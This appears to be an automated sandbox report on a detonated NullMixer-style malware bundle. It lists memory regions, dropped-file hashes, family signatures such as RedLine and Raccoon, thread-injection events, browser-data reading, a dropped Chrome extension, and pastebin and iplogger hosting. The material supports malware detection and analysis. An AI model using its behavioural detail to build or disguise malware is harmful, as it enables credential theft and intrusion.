memory/3036-172-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3036-171-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3036-170-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3036-168-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/4788-191-0x0000000006DD0000-0x0000000006DEE000-memory.dmp
memory/4404-194-0x000000006F840000-0x000000006F88C000-memory.dmp
memory/4788-193-0x0000000006E00000-0x0000000006EA3000-memory.dmp
memory/4788-181-0x000000006F840000-0x000000006F88C000-memory.dmp
memory/4232-210-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4232-213-0x0000000005280000-0x000000000538A000-memory.dmp
memory/4232-214-0x00000000051B0000-0x00000000051EC000-memory.dmp
memory/4404-215-0x00000000074D0000-0x00000000074DA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed067ba5199af5f.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/4232-212-0x0000000005150000-0x0000000005162000-memory.dmp
memory/4232-211-0x00000000055F0000-0x0000000005C08000-memory.dmp
memory/4788-217-0x0000000007130000-0x0000000007141000-memory.dmp
memory/4404-216-0x00000000076C0000-0x0000000007756000-memory.dmp
memory/4788-230-0x0000000007160000-0x000000000716E000-memory.dmp
memory/4404-204-0x0000000007AE0000-0x000000000815A000-memory.dmp
memory/4404-233-0x0000000007770000-0x0000000007778000-memory.dmp
memory/4788-240-0x0000000073900000-0x00000000740B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\AmtZY.zXT
| MD5 | 6dd35c1b829aa136dfa8d19a3d925b02 |
| SHA1 | 5443dde6e8c2948dfa2626d58c7cf957ea9fcd2c |
| SHA256 | 07e1aecb0743f29ce796de864144cfc7d64af919ca1445dc286d1be217a94298 |
| SHA512 | 536a26d31e795b8c7a8b3a4b8855465dd6b287410e2c2e41d7b5ed0dccff63757d50f3a6a85455537be16515064d801c04262b391e6a81d89540f88f6532072d |
C:\Users\Admin\AppData\Local\Temp\nytFSko.4
| MD5 | f07fb7ba321155969395fd0bb1b66ecd |
| SHA1 | c33f97f3bcd9152263cd3a267f7718bfe74871d4 |
| SHA256 | 3b408cb12cfc6e064674313ac9b2bc6e5c479209432d8a24d60638230e6d09ee |
| SHA512 | 90e444d2035dc5d64ad62f2ced9227a9f0227a97a358afc987d4efa6a93d1adc3eb8f329a670088eade9e6fd863ed8c2a6e194278c9c61eb12db90c6c04cb1cd |
C:\Users\Admin\AppData\Local\Temp\m9WDKH25.n
| MD5 | 102c7b74c9389ba3f6b3edc9d78354a5 |
| SHA1 | 1f87d39721fc1248b480f3d34f53fa06881a9e60 |
| SHA256 | a0c96cecc558707b247549e2a4543d354270f8747f2c493cd1be2adb332f991e |
| SHA512 | 9e404873661be23cd92eaada3eb8e16101df306af7eda46cc35a37c59131c1452ef50d465ef7f84a222fadf8821c24ffaa93e6b2c030ba93c44623aa7106077d |
C:\Users\Admin\AppData\Local\Temp\lPmE79O.f1
| MD5 | 3d4be60221c31167e0880e394bfc4da9 |
| SHA1 | 406ce7505abb85bfe841b043a3c0c9fc4accf6c5 |
| SHA256 | 736b628abd066f9bbc93148f2060e750fb8e7d1df03b6a5ab4501e1b0a7ac6db |
| SHA512 | b08998c99352173c7d016f344292362b31b66dcb78a333a4b0deb25c0abcfcade3db9687b6e1bf866d882a0c3490b2f5d7da1e4f460eff39745df823b93ce806 |
C:\Users\Admin\AppData\Local\Temp\SVnzW.C2
| MD5 | 1046521a4754730fa8d91ffe7bb86dd7 |
| SHA1 | c588fef06fa101c894d165cf58b0d930b84f32bb |
| SHA256 | de20c6946360e923936c865b9d44e038e6046ca2c733043010913f3ed94ebfc5 |
| SHA512 | ec2ba5fde73358c65eec9e3dd61e32574a34ac580d2f0afb9f545818cbaedc2d7342f4e20dcb3e57250a1e350c3a9e05ab3fee0b3fe90feeb2fdbb34cb0654c8 |
C:\Users\Admin\AppData\Local\Temp\OJM3YR.x
| MD5 | 560cd503ea8d56af71af388068c37a0a |
| SHA1 | e33edf708a7dde97afca2f5dc04b3de35a55c5ad |
| SHA256 | f5ba7d73b7deed6a565cba19773085927dc34123633e466129a4a7a6be840cc4 |
| SHA512 | 52114327d022eeb3832742ad81b1881a8efe3e66632900298e59569cb44532aa06a63a3c65d5b1ab339b8e5e285b360584bbbe0c1db68442f478a24a81132996 |
C:\Users\Admin\AppData\Local\Temp\ZSPeLY.cnM
| MD5 | b3eb9fd17e8ad098cabb8c902e9e229b |
| SHA1 | 496db608d89ede6d7e52cc12c87fd51985d77dd3 |
| SHA256 | 48ff5cfc37c60e061bc6479c3fcf221527693c3e24c18e5e23e6287d4e38f3e7 |
| SHA512 | 5fdbe3bac951c3c5c0e3ab21fe308b6072f5b3cb3ee9ddb414226df52268baf860b562564b024c3d817af3b5da87511762a7220493033b74dd650bc8ccf809f9 |
C:\Users\Admin\AppData\Local\Temp\X5W6AA.ZS
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
memory/4172-256-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4404-239-0x0000000073900000-0x00000000740B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 874c28a44bb613b71919f06365a823a0 |
| SHA1 | d85614eeb4e6c9517eedb93b405c4077133576e0 |
| SHA256 | 77b8b49ee116b159117ac51fb2c405881beca0dc0df825e2b3020c98569f2fb9 |
| SHA512 | 777df7ab41538bb2b13c56054ce7f9d593c3e5ff8f1e0bc616c438381c590d66fdf917d843154681554df8bc9a93699cea316ecca9755be9f3a264374aaea5e7 |
memory/4788-232-0x0000000007260000-0x000000000727A000-memory.dmp
memory/968-257-0x0000000003540000-0x00000000035E7000-memory.dmp
memory/4788-231-0x0000000007170000-0x0000000007184000-memory.dmp
memory/4788-207-0x0000000006F30000-0x0000000006F4A000-memory.dmp
memory/4788-178-0x0000000006B90000-0x0000000006BC2000-memory.dmp
memory/1124-174-0x0000000000400000-0x0000000002DAA000-memory.dmp
memory/3036-164-0x0000000000400000-0x000000000051C000-memory.dmp
memory/968-261-0x0000000003600000-0x0000000003694000-memory.dmp
memory/968-259-0x0000000003600000-0x0000000003694000-memory.dmp
memory/968-258-0x0000000003600000-0x0000000003694000-memory.dmp
memory/4404-66-0x0000000004B50000-0x0000000004B86000-memory.dmp
memory/3036-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3036-60-0x0000000064941000-0x000000006494F000-memory.dmp
memory/3036-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3036-56-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3036-55-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3036-53-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3036-54-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3036-52-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3036-51-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/3036-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1760-263-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/8-262-0x0000000000400000-0x0000000000414000-memory.dmp
memory/968-264-0x0000000000400000-0x000000000055D000-memory.dmp
memory/968-273-0x0000000003600000-0x0000000003694000-memory.dmp
memory/968-274-0x00000000036A0000-0x000000000565B000-memory.dmp
memory/968-275-0x0000000005660000-0x00000000056ED000-memory.dmp
memory/968-276-0x0000000005700000-0x0000000005789000-memory.dmp
memory/968-279-0x0000000005700000-0x0000000005789000-memory.dmp
memory/968-280-0x0000000000F20000-0x0000000000F21000-memory.dmp
memory/968-281-0x0000000000F30000-0x0000000000F34000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3180 set thread context of 2996 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe |
| PID 1032 set thread context of 4504 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe |
| PID 1900 set thread context of 2104 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue192c34b1c2f5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cef5687a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue197e9ec0ff0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c28f648204dbd4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
